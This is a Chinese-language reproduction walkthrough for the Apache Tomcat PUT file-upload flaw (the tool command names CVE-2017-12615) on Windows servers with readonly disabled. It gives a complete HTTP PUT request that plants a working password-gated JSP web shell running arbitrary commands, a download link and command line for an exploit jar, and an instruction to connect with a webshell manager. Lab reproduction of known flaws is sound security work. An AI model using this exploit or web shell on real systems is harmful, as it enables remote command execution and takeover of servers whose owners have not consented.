目錄
漏洞環境:當 Tomcat運行在Windows操作系統,且啟用了HTTP PUT請求方法(例如,將 readonly 初始化參數由默認值設置為 false),攻擊者將有可能可通過精心構造的攻擊請求上傳任意文件,包括JSP類型的木馬。
影響范圍:Apache Tomcat 7.0.0 - 7.0.81
漏洞復現:
Tomcat版本:Tomcat 7.0.39
打開Tomcat安裝目錄的 conf\web.xml ,添加如下配置。在Tomcat7.0版本下默認配置是開啟readonly的,需要手動配置readonly為false才可以進行漏洞利用。
抓包,修改方式為OPTIONS,發現允許PUT方法
將數據包修改為如下,點擊 Go (我們可以將PUT的內容修改為其他類型的JSP木馬)
PUT /test.jsp/ HTTP/1.1
Host: 127.0.0.1:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 423
<%
if("123".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[1024];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
訪問網站根目錄下的test.jsp
漏洞利用工具:
https://download.csdn.net/download/qq_36119192/11665567
java -jar CVE-2017-12615-Exploit.jar http://127.0.0.1:8080/ test.jsp 木馬文件的路徑
然后,用冰蠍連接 http://127.0.0.1:8080/test.jsp 即可。